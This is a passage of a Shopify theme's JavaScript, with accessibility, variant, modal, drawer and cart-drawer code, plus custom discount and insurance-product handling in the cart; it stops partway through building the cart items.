window.theme = window.theme || {};
window.slate = window.slate || {};

window.lazySizesConfig = window.lazySizesConfig || {};
lazySizesConfig.expFactor = 4;

(function($){
    var $ = jQuery = $;

    slate.utils = {
        /**
         * _.defaultTo from lodash
         * Checks `value` to determine whether a default value should be returned in
         * its place. The `defaultValue` is returned if `value` is `NaN`, `null`,
         * or `undefined`.
         * Source: https://github.com/lodash/lodash/blob/master/defaultTo.js
         *
         * @param {*} value - Value to check
         * @param {*} defaultValue - Default value
         * @returns {*} - Returns the resolved value
         */
        defaultTo: function(value, defaultValue) {
            return (value == null || value !== value) ? defaultValue : value
        }
    };

    slate.a11y = {

        /**
         * For use when focus shifts to a container rather than a link
         * eg for In-page links, after scroll, focus shifts to content area so that
         * next `tab` is where user expects if focusing a link, just $link.focus();
         *
         * @param {JQuery} $element - The element to be acted upon
         */
        pageLinkFocus: function($element) {
            var focusClass = 'js-focus-hidden';

            $element.first()
                .attr('tabIndex', '-1')
                .focus()
                .addClass(focusClass)
                .one('blur', callback);

            function callback() {
                $element.first()
                    .removeClass(focusClass)
                    .removeAttr('tabindex');
            }
        },

        /**
         * If there's a hash in the url, focus the appropriate element
         */
        focusHash: function() {
            var hash = window.location.hash;

            // is there a hash in the url? is it an element on the page?
            if (hash && document.getElementById(hash.slice(1))) {
                this.pageLinkFocus($(hash));
            }
        },

        /**
         * When an in-page (url w/hash) link is clicked, focus the appropriate element
         */
        bindInPageLinks: function() {
            $('a[href*=#]').on('click', function(evt) {
                this.pageLinkFocus($(evt.currentTarget.hash));
            }.bind(this));
        },

        /**
         * Traps the focus in a particular container
         *
         * @param {object} options - Options to be used
         * @param {jQuery} options.$container - Container to trap focus within
         * @param {jQuery} options.$elementToFocus - Element to be focused when focus leaves container
         * @param {string} options.namespace - Namespace used for new focus event handler
         */
        trapFocus: function(options) {
            var eventName = options.namespace
                ? 'focusin.' + options.namespace
                : 'focusin';

            if (!options.$elementToFocus) {
                options.$elementToFocus = options.$container;
            }

            options.$container.attr('tabindex', '-1');
            options.$elementToFocus.focus();

            $(document).off('focusin');

            $(document).on(eventName, function(evt) {
                if (options.$container[0] !== evt.target && !options.$container.has(evt.target).length) {
                    options.$container.focus();
                }
            });
        },

        /**
         * Removes the trap of focus in a particular container
         *
         * @param {object} options - Options to be used
         * @param {jQuery} options.$container - Container to trap focus within
         * @param {string} options.namespace - Namespace used for new focus event handler
         */
        removeTrapFocus: function(options) {
            var eventName = options.namespace
                ? 'focusin.' + options.namespace
                : 'focusin';

            if (options.$container && options.$container.length) {
                options.$container.removeAttr('tabindex');
            }

            $(document).off(eventName);
        },


        // Not from Slate, but fit in the a11y category
        lockMobileScrolling: function(namespace, $element) {
            if ($element) {
                var $el = $element;
            } else {
                var $el = $(document.documentElement).add('body');
            }
            $el.on('touchmove' + namespace, function () {
                return false;
            });
        },

        unlockMobileScrolling: function(namespace, $element) {
            if ($element) {
                var $el = $element;
            } else {
                var $el = $(document.documentElement).add('body');
            }
            $el.off(namespace);
        }
    };

    theme.Sections = function Sections() {
        this.constructors = {};
        this.instances = [];

        $(document)
            .on('shopify:section:load', this._onSectionLoad.bind(this))
            .on('shopify:section:unload', this._onSectionUnload.bind(this))
            .on('shopify:section:select', this._onSelect.bind(this))
            .on('shopify:section:deselect', this._onDeselect.bind(this))
            .on('shopify:block:select', this._onBlockSelect.bind(this))
            .on('shopify:block:deselect', this._onBlockDeselect.bind(this));
    };

    theme.Sections.prototype = $.extend({}, theme.Sections.prototype, {
        createInstance: function(container, constructor) {
            var $container = $(container);
            var id = $container.attr('data-section-id');
            var type = $container.attr('data-section-type');

            constructor = constructor || this.constructors[type];

            if (typeof constructor === 'undefined') {
                return;
            }

            var instance = $.extend(new constructor(container), {
                id: id,
                type: type,
                container: container
            });

            this.instances.push(instance);
        },

        _onSectionLoad: function(evt, subSection, subSectionId) {
            if (AOS) {
                AOS.refreshHard();
            }
            var container = subSection ? subSection : $('[data-section-id]', evt.target)[0];

            if (!container) {
                return;
            }

            this.createInstance(container);

            var instance = subSection ? subSectionId : this._findInstance(evt.detail.sectionId);

            if (!subSection) {
                this._loadSubSections();
            }

            // Run JS only in case of the section being selected in the editor
            // before merchant clicks "Add"
            if (instance && typeof instance.onLoad === 'function') {
                instance.onLoad(evt);
            }
        },

        _loadSubSections: function() {
            if (AOS) {
                AOS.refreshHard();
            }
            $('[data-subsection]').each(function(evt, el) {
                this._onSectionLoad(null, el, $(el).data('section-d'));
            }.bind(this));
        },

        _onSectionUnload: function(evt) {
            var instance = this._removeInstance(evt.detail.sectionId);
            if (instance && typeof instance.onUnload === 'function') {
                instance.onUnload(evt);
            }
        },

        _onSelect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onSelect === 'function') {
                instance.onSelect(evt);
            }
        },

        _onDeselect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onDeselect === 'function') {
                instance.onDeselect(evt);
            }
        },

        _onBlockSelect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onBlockSelect === 'function') {
                instance.onBlockSelect(evt);
            }
        },

        _onBlockDeselect: function(evt) {
            var instance = this._findInstance(evt.detail.sectionId);

            if (instance && typeof instance.onBlockDeselect === 'function') {
                instance.onBlockDeselect(evt);
            }
        },

        _findInstance: function(id) {
            for (var i = 0; i < this.instances.length; i++) {
                if (this.instances[i].id === id) {
                    return this.instances[i];
                }
            }
        },

        _removeInstance: function(id) {
            var i = this.instances.length;
            var instance;

            while(i--) {
                if (this.instances[i].id === id) {
                    instance = this.instances[i];
                    this.instances.splice(i, 1);
                    break;
                }
            }

            return instance;
        },

        register: function(type, constructor) {
            this.constructors[type] = constructor;
            var $sections = $('[data-section-type=' + type + ']');

            $sections.each(function(index, container) {
                this.createInstance(container, constructor);
            }.bind(this));
        }
    });


    /**
     * Currency Helpers
     * -----------------------------------------------------------------------------
     * A collection of useful functions that help with currency formatting
     *
     * Current contents
     * - formatMoney - Takes an amount in cents and returns it as a formatted dollar value.
     *
     * Alternatives
     * - Accounting.js - http://openexchangerates.github.io/accounting.js/
     *
     */

    theme.Currency = (function() {
        var moneyFormat = '$';

        function formatMoney(cents, format) {
            if (typeof cents === 'string') {
                cents = cents.replace('.', '');
            }
            var value = '';
            var placeholderRegex = /\{\{\s*(\w+)\s*\}\}/;
            var formatString = (format || moneyFormat);

            function formatWithDelimiters(number, precision, thousands, decimal) {
                precision = slate.utils.defaultTo(precision, 2);
                thousands = slate.utils.defaultTo(thousands, ',');
                decimal = slate.utils.defaultTo(decimal, '.');

                if (isNaN(number) || number == null) {
                    return 0;
                }

                number = (number / 100.0).toFixed(precision);

                var parts = number.split('.');
                var dollarsAmount = parts[0].replace(/(\d)(?=(\d\d\d)+(?!\d))/g, '$1' + thousands);
                var centsAmount = parts[1] ? (decimal + parts[1]) : '';

                return dollarsAmount + centsAmount;
            }

            switch (formatString.match(placeholderRegex)[1]) {
                case 'amount':
                    value = formatWithDelimiters(cents, 2);
                    break;
                case 'amount_no_decimals':
                    value = formatWithDelimiters(cents, 0);
                    break;
                case 'amount_with_comma_separator':
                    value = formatWithDelimiters(cents, 2, '.', ',');
                    break;
                case 'amount_no_decimals_with_comma_separator':
                    value = formatWithDelimiters(cents, 0, '.', ',');
                    break;
                case 'amount_no_decimals_with_space_separator':
                    value = formatWithDelimiters(cents, 0, ' ');
                    break;
            }

            return formatString.replace(placeholderRegex, value);
        }

        return {
            formatMoney: formatMoney
        }
    })();


    /**
     * Image Helper Functions
     * -----------------------------------------------------------------------------
     * A collection of functions that help with basic image operations.
     *
     */

    theme.Images = (function() {

        /**
         * Find the Shopify image attribute size
         *
         * @param {string} src
         * @returns {null}
         */
        function imageSize(src) {
            if (!src) {
                return '620x'; // default based on theme
            }

            var match = src.match(/.+_((?:pico|icon|thumb|small|compact|medium|large|grande)|\d{1,4}x\d{0,4}|x\d{1,4})[_\.@]/);

            if (match !== null) {
                return match[1];
            } else {
                return null;
            }
        }

        /**
         * Adds a Shopify size attribute to a URL
         *
         * @param src
         * @param size
         * @returns {*}
         */
        function getSizedImageUrl(src, size) {
            if (size == null) {
                return src;
            }

            if (size === 'master') {
                return this.removeProtocol(src);
            }

            var match = src.match(/\.(jpg|jpeg|gif|png|bmp|bitmap|tiff|tif)(\?v=\d+)?$/i);

            if (match != null) {
                var prefix = src.split(match[0]);
                var suffix = match[0];

                return this.removeProtocol(prefix[0] + '_' + size + suffix);
            }

            return null;
        }

        function removeProtocol(path) {
            return path.replace(/http(s)?:/, '');
        }

        return {
            imageSize: imageSize,
            getSizedImageUrl: getSizedImageUrl,
            removeProtocol: removeProtocol
        };
    })();

    slate.Variants = (function() {

        function Variants(options) {
            this.$container = options.$container;
            this.product = options.product;
            this.singleOptionSelector = options.singleOptionSelector;
            this.originalSelectorId = options.originalSelectorId;
            this.enableHistoryState = options.enableHistoryState;
            this.currentVariant = this._getVariantFromOptions();

            $(this.singleOptionSelector, this.$container).on('change', this._onSelectChange.bind(this));
        }

        Variants.prototype = $.extend({}, Variants.prototype, {

            _getCurrentOptions: function() {
                var currentOptions = $.map($(this.singleOptionSelector, this.$container), function(element) {
                    var $element = $(element);
                    var type = $element.attr('type');
                    var currentOption = {};

                    if (type === 'radio' || type === 'checkbox') {
                        if ($element[0].checked) {
                            currentOption.value = $element.val();
                            currentOption.index = $element.data('index');

                            return currentOption;
                        } else {
                            return false;
                        }
                    } else {
                        currentOption.value = $element.val();
                        currentOption.index = $element.data('index');

                        return currentOption;
                    }
                });

                // remove any unchecked input values if using radio buttons or checkboxes
                currentOptions = this._compact(currentOptions);

                return currentOptions;
            },

            _getVariantFromOptions: function() {
                var selectedValues = this._getCurrentOptions();
                var variants = this.product.variants;
                var found = false;

                variants.forEach(function(variant) {
                    var match = true;
                    var options = variant.options;

                    selectedValues.forEach(function(option) {
                        // console.log('try to match ' + option.value + ' with ' + variant[option.index]);

                        if (match) {
                            match = (variant[option.index] === option.value);
                        }
                    });

                    if (match) {
                        found = variant;
                    }
                });

                return found || null;
            },

            _onSelectChange: function() {
                var variant = this._getVariantFromOptions();

                this.$container.trigger({
                    type: 'variantChange',
                    variant: variant
                });

                if (!variant) {
                    return;
                }

                this._updateMasterSelect(variant);
                this._updateImages(variant);
                this._updatePrice(variant);
                this._updateSKU(variant);
                this.currentVariant = variant;

                if (this.enableHistoryState) {
                    this._updateHistoryState(variant);
                }
            },

            _updateImages: function(variant) {
                var variantImage = variant.featured_image || {};
                var currentVariantImage = this.currentVariant.featured_image || {};

                if (!variant.featured_image || variantImage.src === currentVariantImage.src) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantImageChange',
                    variant: variant
                });
            },

            _updatePrice: function(variant) {
                if (variant.price === this.currentVariant.price && variant.compare_at_price === this.currentVariant.compare_at_price) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantPriceChange',
                    variant: variant
                });
            },

            _updateSKU: function(variant) {
                if (variant.sku === this.currentVariant.sku) {
                    return;
                }

                this.$container.trigger({
                    type: 'variantSKUChange',
                    variant: variant
                });
            },

            _updateHistoryState: function(variant) {
                if (!history.replaceState || !variant) {
                    return;
                }

                var newurl = window.location.protocol + '//' + window.location.host + window.location.pathname + '?variant=' + variant.id;
                window.history.replaceState({path: newurl}, '', newurl);
            },

            _updateMasterSelect: function(variant) {
                $(this.originalSelectorId, this.$container).val(variant.id);
            },

            // _.compact from lodash
            // https://github.com/lodash/lodash/blob/4d4e452ade1e78c7eb890968d851f837be37e429/compact.js
            _compact: function(array) {
                var index = -1,
                    length = array == null ? 0 : array.length,
                    resIndex = 0,
                    result = [];

                while (++index < length) {
                    var value = array[index];
                    if (value) {
                        result[resIndex++] = value;
                    }
                }
                return result;
            }
        });

        return Variants;
    })();


    /**
     * iFrames
     * -----------------------------------------------------------------------------
     * Wrap videos in div to force responsive layout.
     *
     * @namespace iframes
     */

    slate.rte = {
        wrapTable: function() {
            $('.rte table').wrap('<div class="table-wrapper"></div>');
        },

        wrapVideo: function() {
            var $iframeVideo = $('.rte iframe[src*="youtube.com/embed"], .rte iframe[src*="player.vimeo"]');
            var $iframeReset = $iframeVideo.add('iframe#admin_bar_iframe');

            $iframeVideo.each(function () {
                // Add wrapper to make video responsive
                if (!$(this).parents('.video-wrapper').length) {
                    $(this).wrap('<div class="video-wrapper"></div>');
                }
            });

            $iframeReset.each(function () {
                // Re-set the src attribute on each iframe after page load
                // for Chrome's "incorrect iFrame content on 'back'" bug.
                // https://code.google.com/p/chromium/issues/detail?id=395791
                // Need to specifically target video and admin bar
                this.src = this.src;
            });
        }
    };


    theme.Modals = (function() {
        function Modal(id, name, options) {
            var defaults = {
                close: '.js-modal-close',
                open: '.js-modal-open-' + name,
                openClass: 'modal--is-active',
                closingClass: 'modal--is-closing',
                bodyOpenClass: 'modal-open',
                bodyOpenSolidClass: 'modal-open--solid',
                bodyClosingClass: 'modal-closing',
                closeOffContentClick: true
            };

            this.id = id;
            this.$modal = $('#' + id);

            if (!this.$modal.length) {
                return false;
            }

            this.nodes = {
                $parent: $('html').add('body'),
                $modalContent: this.$modal.find('.modal__inner')
            };

            this.config = $.extend(defaults, options);
            this.modalIsOpen = false;
            this.$focusOnOpen = this.config.focusOnOpen ? $(this.config.focusOnOpen) : this.$modal;
            this.isSolid = this.config.solid;

            this.init();
        }

        Modal.prototype.init = function() {
            var $openBtn = $(this.config.open);

            // Add aria controls
            $openBtn.attr('aria-expanded', 'false');

            $(this.config.open).on('click', this.open.bind(this));
            this.$modal.find(this.config.close).on('click', this.close.bind(this));

            // Close modal if a drawer is opened
            $('body').on('drawerOpen', function() {
                this.close();
            }.bind(this));
        };

        Modal.prototype.open = function(evt) {
            // Keep track if modal was opened from a click, or called by another function
            var externalCall = false;

            // don't open an opened modal
            if (this.modalIsOpen) {
                return;
            }

            // Prevent following href if link is clicked
            if (evt) {
                evt.preventDefault();
            } else {
                externalCall = true;
            }

            // Without this, the modal opens, the click event bubbles up to $nodes.page
            // which closes the modal.
            if (evt && evt.stopPropagation) {
                evt.stopPropagation();
                // save the source of the click, we'll focus to this on close
                this.$activeSource = $(evt.currentTarget);
            }

            if (this.modalIsOpen && !externalCall) {
                this.close();
            }

            this.$modal
                .prepareTransition()
                .addClass(this.config.openClass);
            this.nodes.$parent.addClass(this.config.bodyOpenClass);

            if (this.isSolid) {
                this.nodes.$parent.addClass(this.config.bodyOpenSolidClass);
            }

            this.modalIsOpen = true;

            slate.a11y.trapFocus({
                $container: this.$modal,
                $elementToFocus: this.$focusOnOpen,
                namespace: 'modal_focus'
            });

            if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                this.$activeSource.attr('aria-expanded', 'true');
            }

            $('body').trigger('modalOpen.' + this.id);

            this.bindEvents();
        };

        Modal.prototype.close = function() {
            // don't close a closed modal
            if (!this.modalIsOpen) {
                return;
            }

            // deselect any focused form elements
            $(document.activeElement).trigger('blur');

            this.$modal
                .prepareTransition()
                .removeClass(this.config.openClass)
                .addClass(this.config.closingClass);
            this.nodes.$parent.removeClass(this.config.bodyOpenClass);
            this.nodes.$parent.addClass(this.config.bodyClosingClass);
            var o = this;
            window.setTimeout(function() {
                o.nodes.$parent.removeClass(o.config.bodyClosingClass);
                o.$modal.removeClass(o.config.closingClass);
            }, 500); // modal close css transition

            if (this.isSolid) {
                this.nodes.$parent.removeClass(this.config.bodyOpenSolidClass);
            }

            this.modalIsOpen = false;

            slate.a11y.removeTrapFocus({
                $container: this.$modal,
                namespace: 'modal_focus'
            });

            if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                this.$activeSource.attr('aria-expanded', 'false').focus();
            }

            $('body').trigger('modalClose.' + this.id);

            this.unbindEvents();
        };

        Modal.prototype.bindEvents = function() {
            // Pressing escape closes modal
            this.nodes.$parent.on('keyup.modal', function(evt) {
                if (evt.keyCode === 27) {
                    this.close();
                }
            }.bind(this));

            if (this.config.closeOffContentClick) {
                // Clicking outside of the modal content also closes it
                this.$modal.on('click.modal', this.close.bind(this));

                // Exception to above: clicking anywhere on the modal content will NOT close it
                this.nodes.$modalContent.on('click.modal', function(evt) {
                    evt.stopImmediatePropagation();
                });
            }
        };

        Modal.prototype.unbindEvents = function() {
            this.nodes.$parent.off('.modal');

            if (this.config.closeOffContentClick) {
                this.$modal.off('.modal');
                this.nodes.$modalContent.off('.modal');
            }
        };

        return Modal;
    })();

    theme.Drawers = (function() {
        function Drawer(id, name, ignoreScrollLock) {
            this.config = {
                id: id,
                close: '.js-drawer-close',
                open: '.js-drawer-open-' + name,
                openClass: 'js-drawer-open',
                closingClass: 'js-drawer-closing',
                activeDrawer: 'drawer--is-open',
                namespace: '.drawer-' + name
            };

            this.$nodes = {
                parent: $(document.documentElement).add('body'),
                page: $('#MainContent')
            };

            this.$drawer = $('#' + id);

            if (!this.$drawer.length) {
                return false;
            }

            this.isOpen = false;
            this.ignoreScrollLock = ignoreScrollLock;
            this.init();
        };

        Drawer.prototype = $.extend({}, Drawer.prototype, {
            init: function() {
                var $openBtn = $(this.config.open);

                // Add aria controls
                $openBtn.attr('aria-expanded', 'false');

                $openBtn.on('click', this.open.bind(this));
                this.$drawer.find(this.config.close).on('click', this.close.bind(this));
            },

            open: function(evt) {
                if (evt) {
                    evt.preventDefault();
                }

                if (this.isOpen) {
                    return;
                }

                // Without this the drawer opens, the click event bubbles up to $nodes.page which closes the drawer.
                if (evt && evt.stopPropagation) {
                    evt.stopPropagation();
                    // save the source of the click, we'll focus to this on close
                    this.$activeSource = $(evt.currentTarget);
                }

                this.$drawer.prepareTransition().addClass(this.config.activeDrawer);

                this.$nodes.parent.addClass(this.config.openClass);
                this.isOpen = true;

                slate.a11y.trapFocus({
                    $container: this.$drawer,
                    namespace: 'drawer_focus'
                });

                $('body').trigger('drawerOpen.' + this.config.id);

                if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                    this.$activeSource.attr('aria-expanded', 'true');
                }

                this.bindEvents();
            },

            close: function() {
                if (!this.isOpen) {
                    return;
                }

                // deselect any focused form elements
                $(document.activeElement).trigger('blur');

                this.$drawer.prepareTransition().removeClass(this.config.activeDrawer);

                this.$nodes.parent.removeClass(this.config.openClass);
                this.$nodes.parent.addClass(this.config.closingClass);
                var o = this;
                window.setTimeout(function() {
                    o.$nodes.parent.removeClass(o.config.closingClass);
                }, 500);

                this.isOpen = false;

                slate.a11y.removeTrapFocus({
                    $container: this.$drawer,
                    namespace: 'drawer_focus'
                });

                if (this.$activeSource && this.$activeSource.attr('aria-expanded')) {
                    this.$activeSource.attr('aria-expanded', 'false');
                }

                this.unbindEvents();
            },

            bindEvents: function() {
                if (!this.ignoreScrollLock) {
                    slate.a11y.lockMobileScrolling(this.config.namespace, this.$nodes.page);
                }

                // Clicking out of drawer closes it.
                // Check to see if clicked on element in drawer
                // because of any drawer built witin #MainContent
                this.$nodes.page.on('click' + this.config.namespace, function (evt) {
                    var $target = $(evt.target);
                    var doNotClose = this.elementInsideDrawer($target);
                    if (!doNotClose) {
                        this.close();
                        return false;
                    }

                }.bind(this));

                // Pressing escape closes drawer
                this.$nodes.parent.on('keyup' + this.config.namespace, function(evt) {
                    if (evt.keyCode === 27) {
                        this.close();
                    }
                }.bind(this));
            },

            unbindEvents: function() {
                if (!this.ignoreScrollLock) {
                    slate.a11y.unlockMobileScrolling(this.config.namespace, this.$nodes.page);
                }
                this.$nodes.parent.off(this.config.namespace);
                this.$nodes.page.off(this.config.namespace);
            },

            // Check if clicked element is inside the drawer
            elementInsideDrawer: function($el) {
                return this.$drawer.find($el).length;
            }
        });

        return Drawer;
    })();

    theme.cart = {
        getCart: function() {
            return $.getJSON('/cart.js');
        },

        changeItem: function(key, qty) {

            console.log('change quantity');

            return this._updateCart({
                type: 'POST',
                url: '/cart/change.js',
                data: 'quantity=' + qty + '&id=' + key,
                dataType: 'json'
            });
        },

        addItemFromForm: function(data) {
            return this._updateCart({
                type: 'POST',
                url: '/cart/add.js',
                data: data,
                dataType: 'json'
            });
        },

        _updateCart: function(params) {

            console.log('update cart');

            return $.ajax(params)
                .then(function(cart) {
                    updateInsurance(cart);
                    return cart;
                }.bind(this))
        },

        updateNote: function(note) {
            var params = {
                type: 'POST',
                url: '/cart/update.js',
                data: 'note=' + theme.cart.attributeToString(note),
                dataType: 'json',
                success: function(cart) {},
                error: function(XMLHttpRequest, textStatus) {}
            };

            $.ajax(params);
        },

        attributeToString: function(attribute) {
            if ((typeof attribute) !== 'string') {
                attribute += '';
                if (attribute === 'undefined') {
                    attribute = '';
                }
            }
            return $.trim(attribute);
        }
    }

    $(function() {
        // Add a loading indicator on the cart checkout button (/cart and drawer)
        $('body').on('click', '.cart__checkout', function() {
            $(this).addClass('btn--loading');
        });

        $('body').on('change', 'textarea[name="note"]', function() {
            var newNote = $(this).val();
            theme.cart.updateNote(newNote);
        });


        // Custom JS to prevent checkout without confirming terms and conditions
        $('body').on('click', '.cart__checkout--ajax', function(evt) {
            if ($('#CartAgree').is(':checked')) {
            } else {
                alert(theme.strings.cartTermsConfirmation);
                $(this).removeClass('btn--loading');
                return false;
            }
        });

        $('body').on('click', '.cart__checkout--page', function(evt) {
            if ($('#CartPageAgree').is(':checked')) {
            } else {
                alert(theme.strings.cartTermsConfirmation);
                $(this).removeClass('btn--loading');
                return false;
            }
        });
    });

    theme.QtySelector = (function() {
        var classes = {
            input: '.js-qty__num',
            plus: '.js-qty__adjust--plus',
            minus: '.js-qty__adjust--minus'
        };

        function QtySelector($el, options) {
            this.$wrapper = $el;
            this.$originalInput = $el.find('input[type="number"]');
            this.minValue = this.$originalInput.attr('min') || 1;

            var defaults = {
                namespace: null
            };

            this.options = $.extend(defaults, options);

            this.source = $('#JsQty').html();
            this.template = Handlebars.compile(this.source);

            var quantities = {
                current: this._getOriginalQty(),
                add: this._getOriginalQty() + 1,
                minus: this._getOriginalQty() - 1
            };

            this.data = {
                key: this._getProductKey(),
                itemQty: quantities.current,
                itemAdd: quantities.add,
                itemMinus: quantities.minus,
                inputName: this._getInputName(),
                inputId: this._getId()
            }

            // Append new quantity selector then remove original
            this.$originalInput.after(this.template(this.data)).remove();
            this.$input = this.$wrapper.find(classes.input);
            this.$plus = this.$wrapper.find(classes.plus);
            this.$minus = this.$wrapper.find(classes.minus);

            this.initEventListeners();
        };

        QtySelector.prototype = $.extend({}, QtySelector.prototype, {
            _getProductKey: function() {
                return this.$originalInput.data('id') || null;
            },

            _getOriginalQty: function() {
                return parseInt(this.$originalInput.val());
            },

            _getInputName: function() {
                return this.$originalInput.attr('name');
            },

            _getId: function() {
                return this.$originalInput.attr('id');
            },

            initEventListeners: function() {
                this.$plus.on('click', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.addQty(qty);
                }.bind(this));

                this.$minus.on('click', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.subtractQty(qty);
                }.bind(this));

                this.$input.on('change', function() {
                    var qty = this.validateQty(this.$input.val());
                    this.changeQty(qty);
                }.bind(this));
            },

            addQty: function(number) {
                var qty = number + 1;
                this.changeQty(qty);
            },

            subtractQty: function(number) {
                var qty = number - 1;
                if (qty <= this.minValue) {
                    qty = this.minValue;
                }
                this.changeQty(qty);
            },

            changeQty: function(qty) {
                this.$input.val(qty);
                $('body').trigger('qty' + this.options.namespace, [this.data.key, qty]);
            },

            validateQty: function(number) {
                if((parseFloat(number) == parseInt(number)) && !isNaN(number)) {
                    // We have a valid number!
                } else {
                    // Not a number. Default to 1.
                    number = 1;
                }
                return parseInt(number);
            }
        });

        return QtySelector;
    })();

    theme.CartDrawer = (function() {
        var config = {
            namespace: '.ajaxcart'
        };

        var selectors = {
            drawer: '#CartDrawer',
            container: '#CartContainer',
            template: '#CartTemplate',
            fixedFooter: '.drawer__footer--fixed',
            fixedInnerContent: '.drawer__inner--has-fixed-footer',
            cartBubble: '.cart-link__bubble'
        };

        function CartDrawer() {
            this.status = {
                loaded: false,
                loading: false
            };

            this.qtySelectors = [];

            this.drawer = new theme.Drawers('CartDrawer', 'cart');

            // Prep handlebars template
            var source = $(selectors.template).html();
            this.template = Handlebars.compile(source);

            // Build cart on page load so it's ready in the drawer
            theme.cart.getCart().then(this.buildCart.bind(this));

            this.initEventListeners();
        };

        CartDrawer.prototype = $.extend({}, CartDrawer.prototype, {
            initEventListeners: function() {
                $('body').on('updateCart' + config.namespace, this.initQtySelectors.bind(this));
                $('body').on('updateCart' + config.namespace, this.sizeFooter.bind(this));
                $('body').on('updateCart' + config.namespace, this.updateCartNotification.bind(this));
                $('body').on('drawerOpen.CartDrawer', this.sizeFooter.bind(this));

                $(window).on('resize' + config.namespace, $.debounce(150, this.sizeFooter.bind(this)));

                $('body').on('added.ajaxProduct', function() {
                    theme.cart.getCart().then(function(cart) {
                        this.buildCart(cart, true);
                    }.bind(this));
                }.bind(this));
            },

            buildCart: function(cart, openDrawer) {

                // if(window.BOLD && BOLD.common && BOLD.common.cartDoctor && typeof BOLD.common.cartDoctor.fix === 'function'){
                //     cart = BOLD.common.cartDoctor.fix(cart);
                // }

                console.log('building the cart');

                $('body').trigger('updateCart.customCart', cart);

                this.loading(true);
                this.emptyCart();

                if (cart.item_count === 0) {
                    $(selectors.container).append('<p class="appear-animation appear-delay-3">' + theme.strings.cartEmpty +'</p>');
                } else {
                    var items = [];
                    var item = {};
                    var data = {};
                    var animation_row = 1;

                // START Added by SM
                var total_price = cart.total_price;
                var modifier = 1;
                if(shappify_customer_tags) {

                    // Check for wholesale discount (33.3% off)
                    if ($.inArray('wholesale', shappify_customer_tags) >= 0) {
                        modifier = 0.6667; // changed from 0.667 - 10282025
                    } else if ($.inArray('verified', shappify_customer_tags) >= 0) {
                        modifier = 0.5;
                    }
                    
                    // Apply additional VIP discount (10% off) for customers with $10k+ spent
                    if($.inArray('vip', shappify_customer_tags) >= 0) {
                        modifier = modifier * 0.6; // changed from 0.9 - 10282025
                    }

                }

                // END Added by SM

                    // START Added by SM - add the free product to the cart and update the cart drawer
                    has_free = false;
                  	has_course = false;
                    full_price = false;
                    free_index = false;
                    full_index = false;
                    has_hair = false;
                    has_insurance = false;
                    insurance_variant_id = 0;
                    insurance_product_id = 0;
                    insurance_index = 0;
                    $.each(cart.items, function(index, element){

                        if(element.product_type == 'hair') {
                            has_hair = true;
                        }

                        if(element.product_type == 'insurance') {
                            has_insurance = true;
                            insurance_variant_id = element.variant_id;
                            insurance_product_id = element.product_id;
                            insurance_index = index;
                        }

                        // Cart already has the free product
                        if(element.variant_id == 31825101455439) {
                            free_index = index;
                            has_free = true;
                        }

                        // Has course in the cart
                      	// Change the PRODUCT ID BEFORE DEPLOY
                        if(element.product_id == 6765789413455){
							has_course = true;
                        }

                        // Cart already has the product, but not free
                        // if(element.variant_id == 31825101422671) {
                        //     full_index = index;
                        //     full_price = true;
                        //     total_price -= (element.price * element.quantity);
                        // }

                    });

                    if(has_insurance) {

                        if(has_hair) {

                        } else {

                            // Remove the insurance if there is no hair
                            CartJS.updateItemById(insurance_variant_id, 0);

                            $.ajax({
                                type: 'POST',
                                url: 'http://insurance.startupmasters.eu/api/delete-product',
                                data: 'product_id=' + insurance_product_id,
                                dataType: 'json',
                                success: function(response) {
                                },
                                error: function(XMLHttpRequest, textStatus) {
                                }
                            });

                            cart.items.splice(insurance_index, 1);

                            if(cart.items.length == 0) {
                                this.emptyCart();
                                $('body').trigger('added.ajaxProduct');
                                return;
                            }

                        }
                    }

                    total_price *= modifier;

                    // This removes the free kit
                    // if(total_price >= 60000) {
                    //
                    //     if(full_price == true) {
                    //
                    //         jQuery.post('/cart/update.js', {
                    //             updates: {
                    //                 31825101422671: 0
                    //             }
                    //         }, null, 'json');
                    //
                    //         cart.items.splice(full_index, 1);
                    //
                    //     }
                    //
                    //     if(has_free == false) {
                    //
                    //         animation_row+=2;
                    //
                    //         jQuery.post('/cart/add.js', {
                    //             quantity: 1,
                    //             id: 31825101455439
                    //         }, null, 'json');
                    //
                    //         item = {
                    //             key: '23193773768804:d5c460aaa270e3deb6fc0ed3fe2edebc',
                    //             url: '/products/limited-edition-black-matte-toolkit',
                    //             img: '//cdn.shopify.com/s/files/1/0068/4018/9028/products/HL-google-toolkit-500x500.png?v=1548330549',
                    //             animationRow: animation_row + 2,
                    //             name: 'Limited Edition Matte Black Toolkit',
                    //             variation: 'free',
                    //             properties: null,
                    //             itemQty: 1,
                    //             price: '$0.00',
                    //             discountedPrice: '$0.00',
                    //             discounts: [],
                    //             discountsApplied: false,
                    //             vendor: 'sm-hairlocks'
                    //         };
                    //
                    //         items.push(item);
                    //
                    //     } else {
                    //
                    //         if(cart.items[free_index].quantity > 1) {
                    //
                    //             jQuery.post('/cart/update.js', {
                    //                 updates: {
                    //                     31825101455439: 1
                    //                 }
                    //             }, null, 'json');
                    //
                    //             cart.items[free_index].quantity = 1;
                    //
                    //         }
                    //
                    //     }
                    //
                    // } else {
                    //
                    //     if(full_price) {
                    //         total_price = cart.total_price * modifier;
                    //     }
                    //
                    //     // Removing the free product
                    //     $.each(cart.items, function(index, element){
                    //
                    //         if(element != undefined && element.variant_id == 31825101455439) {
                    //
                    //             jQuery.post('/cart/update.js', {
                    //                 updates: {
                    //                     31825101455439: 0
                    //                 }
                    //             }, null, 'json');
                    //
                    //             cart.items.splice(free_index, 1);
                    //
                    //         }
                    //
                    //     });
                    //
                    // }
                    // END Added by SM

                    $.each(cart.items, function(index, product) {

                        var prodImg;
                        if (product.image !== null) {
                            prodImg = product.image.replace(/(\.[^.]*)$/, "_180x$1");
                        } else {
                            prodImg = '//cdn.shopify.com/s/assets/admin/no-image-medium-cc9732cb976dd349a0df1d39816fbcc7.gif';
                        }

                        if (product.properties !== null) {
                            $.each(product.properties, function(key, value) {
